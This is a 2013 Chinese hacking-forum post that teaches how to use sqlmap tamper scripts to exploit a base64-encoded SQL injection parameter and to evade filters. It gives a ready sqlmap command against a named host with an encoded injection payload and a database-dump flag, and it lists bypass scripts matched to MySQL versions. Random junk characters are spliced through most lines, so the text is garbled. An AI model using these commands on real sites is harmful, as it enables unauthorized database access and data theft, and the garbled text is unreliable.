找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2290|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
  e1 E% O- o4 h' R; R# Z7 q
0 O, b+ b# d' q& gsqlmap的tamper里有个base64encode.py0 D. O# V0 a/ }! \
, N* P) @4 m# K
使用如下
2 D  j  |' W8 d% L& V1 x+ q4 v& r$ t" I6 u$ R
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs, O$ V$ M% q6 }, S$ T

6 m3 ~& n9 p5 A8 L4 r' R1 P% Y' p: N3 I* y+ M
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”* b: ?, _' ~+ x+ Z! ]; t

* k0 M$ b9 }2 b$ F: P其中常用到的bypass脚本绕过SQLMAP主要两个脚本:7 z. d# A- b3 {  U! [

1 v; R9 t( @; w8 ^space2hash.py ,对于MYSQL数据库 4.0, 5.0注入) o, D1 T0 o! f! _: p! j
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入6 T) p# I# ]8 k# E
首先确定目标数据库版本,然后选择相应的脚本。
' h, t- }* r/ Q' R6 [# A, y1 ?  }& b-v 3 --batch --tamper "space2hash.py": W* r& I8 W( t; @( M

8 \; e9 ?* r, h  W还有其他一些插件:; ?7 F/ i" V* D5 q, O7 q, B
encodes编码 ——charencode.py0 Y. N! `/ R3 W. U
base64编码 —— base64encode.py
4 x/ A# l$ F3 ~/ v7 R替换空格和关键字 —— halfversionedmorekeywords.py! |. u9 a) R" E0 K( S4 y$ h( E

) a3 R$ y+ A) r  J8 Y& G, A1 {6 L  ?: h; Q, V
, X) n" `+ t7 M0 f1 I- D

' N! A# u) l+ C' g: J% l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表